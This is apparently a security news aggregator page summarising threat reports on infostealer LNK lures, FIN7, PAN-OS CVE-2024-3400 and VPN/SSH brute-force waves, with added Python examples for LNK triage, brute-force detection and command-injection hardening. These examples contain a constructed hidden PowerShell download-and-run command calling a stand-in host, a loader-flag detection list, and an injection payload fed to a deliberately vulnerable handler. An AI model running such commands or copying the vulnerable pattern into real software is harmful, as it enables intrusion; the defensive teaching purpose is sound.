By Joey Chen, Chetan Raghuprasad and Alex Karkins. 

Cisco Talos discovered a new campaign, ongoing since at least February 2024, in which a threat actor distributes three well-known infostealers: Cryptbot, LummaC2 and Rhadamanthys. Talos also found a new PowerShell command-line argument embedded in the LNK file, used to bypass anti-virus products and download the final payload onto the victims' hosts.…
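An added example, not code from the Talos post: a minimal parser for the Shell Link (.lnk) file format that walks the header, skips the optional LinkTargetIDList and LinkInfo blocks, and decodes the StringData fields so the launch target and COMMAND_LINE_ARGUMENTS can be pulled out for triage, followed by a heuristic scorer for PowerShell loader flags. The sample shortcut, its argument string and the indicator list are constructed for this example; the post does not disclose the specific argument the actor used.

```python
import struct

# LinkFlags bits from the MS-SHLLINK specification used by this parser.
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

# ShellLinkHeader: HeaderSize (always 0x4C) followed by the fixed LinkCLSID.
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# StringData sections appear in this order, each present only if its flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Heuristic triage signals for PowerShell launched from a shortcut by a loader.
# This list is an assumption for the example, not a verdict and not from the post.
SUSPICIOUS = (
    "-w hidden", "-windowstyle hidden", "-ep bypass", "-executionpolicy bypass",
    "-enc", "-nop", "iex", "invoke-expression", "downloadstring", "downloadfile",
    "frombase64string",
)


def _encode_string(value, unicode):
    """StringData field: uint16 character count, then the characters (no terminator)."""
    raw = value.encode("utf-16-le") if unicode else value.encode("cp1252")
    return struct.pack("<H", len(value)) + raw


def build_lnk(relative_path, arguments, working_dir=".", unicode=True):
    """Build a minimal .lnk carrying only RELATIVE_PATH, WORKING_DIR and
    COMMAND_LINE_ARGUMENTS. Constructed sample for this example only."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS
    if unicode:
        flags |= IS_UNICODE
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (HEADER_SIZE - len(header))  # attributes, times, sizes, reserved
    return (header
            + _encode_string(relative_path, unicode)
            + _encode_string(working_dir, unicode)
            + _encode_string(arguments, unicode))


def parse_lnk(data):
    """Validate the header, skip the optional IDList and LinkInfo blocks, and
    decode the StringData fields. Returns a dict of the fields present."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:   # IDListSize (2 bytes) + IDList bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:             # LinkInfoSize (4 bytes) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def suspicious_indicators(arguments):
    """Return the heuristic indicators found in a shortcut's argument string."""
    text = " ".join(arguments.split()).lower()
    return [s for s in SUSPICIOUS if s in text]


def triage_lnk(data):
    """Extract the launch target and arguments from a .lnk and score them."""
    fields = parse_lnk(data)
    args = fields.get("arguments", "")
    return {
        "target": fields.get("relative_path", ""),
        "arguments": args,
        "indicators": suspicious_indicators(args),
    }


# Constructed sample: a shortcut that launches a hidden PowerShell downloader.
SAMPLE_TARGET = r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_ARGS = ('-w hidden -ep bypass -nop -c "IEX (New-Object Net.WebClient)'
               ".DownloadString('http://example.invalid/stage2.ps1')\"")
SAMPLE_LNK = build_lnk(SAMPLE_TARGET, SAMPLE_ARGS)

if __name__ == "__main__":
    print(triage_lnk(SAMPLE_LNK))
```

Real shortcuts usually carry the target in the LinkTargetIDList rather than RELATIVE_PATH; the parser skips that block by size so the StringData offsets stay correct, and COMMAND_LINE_ARGUMENTS is where a loader's PowerShell flags end up regardless of how the target is stored.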
Read More

Organizations are increasingly turning to cloud computing for IT agility, resilience and scalability. Amazon Web Services (AWS) stands at the forefront of this digital transformation, offering a robust, flexible and cost-effective platform that helps businesses drive growth and innovation. 

However, as organizations migrate to the cloud, they face a complex and growing threat landscape of sophisticated and cloud-conscious threat actors.…

Read More

Curated bookmark list categorized by area and event monitoring, person of interest search, corporate profiling, mapping, AI, intelligence analysis, reporting tools, collective tools, cryptocurrency, country specific, verification and fact-checking.

They are broken down into appropriate categories such as:

area and event monitoring
person of interest search
corporate profiling
mapping
artificial intelligence
intelligence analysis
reporting tools
collective tools
cryptocurrency
country specific
verification and fact-checking.…
Read More

This video presents an enlightening discussion on the advancements in AI-driven cyber defense technologies, specifically focusing on a groundbreaking product introduced by Cisco called “Cisco HyperShield.” Here are the critical insights from the video:

🌐 AI in Cybersecurity: The video starts by underscoring the transformative role of AI in cybersecurity, emphasizing that both attackers and defenders are leveraging AI to enhance their capabilities.…
Read More

“There are too many firewall features available today; I am using Cisco ASA as an example for this firewall topic.” Cisco ASA is a versatile network security device that combines firewall, antivirus, intrusion prevention, and virtual private network (VPN) capabilities. Cisco ASA is designed to protect networks and ensure secure communications and data transfer.…

Read More
Summary

In late 2023, BlackBerry analysts identified a spear-phishing campaign by the threat group FIN7 that targeted a large automotive manufacturer based in the United States. FIN7 identified employees in the company's IT department who held higher levels of administrative rights. They used the lure of a free IP scanning tool to run their well-known Anunak backdoor and gain an initial foothold, utilizing living-off-the-land binaries, scripts and libraries (LOLBAS).…

Read More
Overview

Recently, NSFOCUS CERT detected that Palo Alto Networks issued a security announcement and fixed a command injection vulnerability (CVE-2024-3400) in PAN-OS. Because the GlobalProtect gateway or portal configured in PAN-OS does not strictly filter user input, an unauthenticated attacker can send specially crafted packets to execute arbitrary code on the firewall with root privileges.…

Read More

Summary: Cisco has warned about a surge in brute-force attacks targeting various devices, including VPN services, web application authentication interfaces, and SSH services, since March 18, 2024.

Threat Actor: Unknown | Brute-Force Attacks
Victim: Various organizations | Cisco

Key Point:

The attacks have been observed targeting devices such as Cisco Secure Firewall VPN, Check Point VPN, Fortinet VPN, SonicWall VPN, RD Web Services, Mikrotik, Draytek and Ubiquiti.…
Read More

Summary: Cybersecurity researchers have discovered a new campaign that exploits a recently disclosed security flaw in Fortinet FortiClient EMS devices to deliver ScreenConnect and Metasploit Powerfun payloads.

Threat Actor: Unknown | Connect:fun
Victim: Unnamed media company

Key Point:

A new campaign called Connect:fun is exploiting a critical SQL injection flaw in Fortinet FortiClient EMS devices to deliver ScreenConnect and Metasploit Powerfun payloads.…
Read More
During a threat-hunting exercise, Cisco Talos discovered documents with potentially confidential information originating from Ukraine. The documents contained malicious VBA code, indicating they may be used as lures to infect organizations. The results of the investigation have shown that the presence of the malicious code is due to the activity of a rare multi-module virus that’s delivered via the .NET…
Read More

Summary: This article discusses the technical analysis of the vulnerability CVE-2024-3400 in Palo Alto Networks’ PAN-OS and the exploitation of this vulnerability by threat actors.

Threat Actor: Operation MidnightEclipse
Victim: Palo Alto Networks

Key Point:

Researchers have discovered a critical command injection vulnerability (CVE-2024-3400) in Palo Alto Networks PAN-OS software, which allows threat actors to execute arbitrary code with root privileges on affected firewalls.…
Read More

Cisco Talos would like to acknowledge Brandon White of Cisco Talos and Phillip Schafer, Mike Moran and Becca Lynch of the Duo Security Research team for their research that led to the identification of these attacks.

Cisco Talos is actively monitoring a global increase in brute-force attacks against a variety of targets, including Virtual Private Network (VPN) services, web application authentication interfaces and SSH services since at least March 18, 2024.…
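The two items above (the Cisco warning and this Talos post) describe the same wave of brute-force attempts against VPN, web authentication and SSH services. As an added example that is not from either post, here is detection logic for the SSH case run over constructed sshd log lines: a sliding window catches rapid password guessing from one source, and a distinct-username count catches the slower spraying pattern that a pure rate threshold misses. The log lines, IP addresses, thresholds and window size are all assumptions chosen for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# sshd "Failed password" lines in syslog format (the timestamp carries no year).
FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_failed_login(line, year=2024):
    """Return (timestamp, username, source_ip) for a failed-login line, else None.
    The syslog line has no year, so the caller supplies it."""
    m = FAILED_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["user"], m["ip"]


def detect_bruteforce(lines, window_s=60, fail_threshold=5, spray_threshold=3):
    """Flag a source IP when it produces fail_threshold failures inside a sliding
    window of window_s seconds (brute force), or tries spray_threshold distinct
    usernames at any rate (password spraying). Returns
    {ip: {"reasons": [...], "failures_in_window": peak, "distinct_users": n}}."""
    events = sorted(e for e in map(parse_failed_login, lines) if e)
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    users = defaultdict(set)      # ip -> usernames tried so far
    alerts = {}
    for ts, user, ip in events:
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        users[ip].add(user)
        reasons = []
        if len(q) >= fail_threshold:
            reasons.append("brute-force")
        if len(users[ip]) >= spray_threshold:
            reasons.append("password-spray")
        if reasons:
            rec = alerts.setdefault(
                ip, {"reasons": [], "failures_in_window": 0, "distinct_users": 0})
            for r in reasons:
                if r not in rec["reasons"]:
                    rec["reasons"].append(r)
            rec["failures_in_window"] = max(rec["failures_in_window"], len(q))
            rec["distinct_users"] = len(users[ip])
    return alerts


# Constructed sample log (not real telemetry): a rapid brute force from
# 203.0.113.5, a low-and-slow spray from 198.51.100.7, and one stray failure.
SAMPLE_LOG = """\
Apr 18 10:00:01 bastion sshd[2211]: Failed password for root from 203.0.113.5 port 51234 ssh2
Apr 18 10:00:05 bastion sshd[2212]: Failed password for root from 203.0.113.5 port 51235 ssh2
Apr 18 10:00:09 bastion sshd[2213]: Failed password for root from 203.0.113.5 port 51236 ssh2
Apr 18 10:00:14 bastion sshd[2214]: Failed password for root from 203.0.113.5 port 51237 ssh2
Apr 18 10:00:20 bastion sshd[2215]: Failed password for root from 203.0.113.5 port 51238 ssh2
Apr 18 10:00:31 bastion sshd[2216]: Failed password for root from 203.0.113.5 port 51239 ssh2
Apr 18 10:00:40 bastion sshd[2217]: Accepted publickey for deploy from 192.0.2.9 port 40022 ssh2
Apr 18 10:02:00 bastion sshd[2300]: Failed password for invalid user admin from 198.51.100.7 port 60001 ssh2
Apr 18 10:06:30 bastion sshd[2301]: Failed password for invalid user test from 198.51.100.7 port 60002 ssh2
Apr 18 10:11:45 bastion sshd[2302]: Failed password for invalid user oracle from 198.51.100.7 port 60003 ssh2
Apr 18 10:12:10 bastion sshd[2303]: Failed password for deploy from 192.0.2.9 port 40023 ssh2
Apr 18 10:12:11 bastion CRON[2310]: pam_unix(cron:session): session opened for user root
""".splitlines()

if __name__ == "__main__":
    for ip, rec in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, rec)
```

The same shape applies to VPN and web-login logs once the parser is swapped: keep the per-source sliding window for volume and the distinct-username set for spraying, since the posts note both high-volume and spread-out attempts.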

Read More

Identifier: TRR240401 

On March 25, 2024, the U.S. Department of Justice (DoJ) released an indictment of seven hackers associated with APT31, a “hacking group in support of China’s Ministry of State Security” (MSS) which has been active for 14 years. On the same day, the Department of Treasury enacted sanctions on several entities listed in the document.…

Read More

Summary: Threat actors are exploiting a zero-day flaw in Palo Alto Networks PAN-OS software to execute arbitrary code with root privileges on the firewall.

Threat Actor: Operation MidnightEclipse
Victim: Palo Alto Networks

Key Point:

Threat actors are exploiting a zero-day vulnerability in Palo Alto Networks PAN-OS software to execute arbitrary code with root privileges on the firewall.…
Read More

On Friday, April 12, Palo Alto Networks published an advisory on CVE-2024-3400, a CVSS 10 zero-day vulnerability in several versions of PAN-OS, the operating system that runs on the company’s firewalls. According to the vendor advisory, if conditions for exploitability are met, the vulnerability may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.…

Read More

Threat Actor: Unknown
Victim: Palo Alto Networks
Price: Not applicable
Exfiltrated Data Type: Not applicable

Additional Information:

The vulnerability, designated as CVE-2024-3400, affects Palo Alto Networks’ PAN-OS software, specifically targeting the GlobalProtect feature. The vulnerability allows malicious actors to execute arbitrary code with root privileges on vulnerable firewalls.…
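The CVE-2024-3400 items on this page (the NSFOCUS, MidnightEclipse, Rapid7 and this summary) all describe the same class of bug: a value from an unauthenticated request reaches an OS command without strict filtering. As an added example that is not PAN-OS code and does not reproduce the actual exploit, here is that class in miniature: a vulnerable handler that splices a session identifier into a shell string, beside a hardened one that allowlists the value and passes it as a single argv element with no shell. The handler, the identifier format and the payload are assumptions for illustration; the command run is a harmless echo so the block is safe to execute.

```python
import re
import subprocess

# Strict allowlist for a session identifier, applied before the value goes
# anywhere near the operating system. The format is an assumption for this
# example; a real product defines its own.
SESSION_ID_RE = re.compile(r"^[A-Za-z0-9_-]{8,64}$")


def touch_session_vulnerable(session_id):
    """VULNERABLE: the raw request value is spliced into a shell command line,
    so quote and metacharacters in it are interpreted by /bin/sh.
    printf stands in for a real filesystem action so it is safe to run here."""
    cmd = f"printf 'touch session {session_id}\\n'"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout


def touch_session_hardened(session_id):
    """HARDENED: reject anything outside the allowlist, then invoke the
    program with an argv list and no shell, so the value is only ever data."""
    if not SESSION_ID_RE.fullmatch(session_id):
        raise ValueError("rejected session id")
    out = subprocess.run(["echo", "touch session", session_id],
                         capture_output=True, text=True)
    return out.stdout


# Constructed inputs: one well-formed identifier and one that closes the
# single-quoted string and appends a second command.
BENIGN_ID = "sess_0123abcd"
INJECTED_ID = "abc'; echo INJECTED; echo '"

if __name__ == "__main__":
    print(repr(touch_session_vulnerable(BENIGN_ID)))
    print(repr(touch_session_vulnerable(INJECTED_ID)))   # second command runs
    print(repr(touch_session_hardened(BENIGN_ID)))
    try:
        touch_session_hardened(INJECTED_ID)
    except ValueError as e:
        print("hardened:", e)
```

Escaping the value for one shell is the weaker fix; removing the shell from the call path and validating against a positive pattern removes the interpretation step entirely, which is the property the advisories' "does not strictly filter user input" wording points at.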
Read More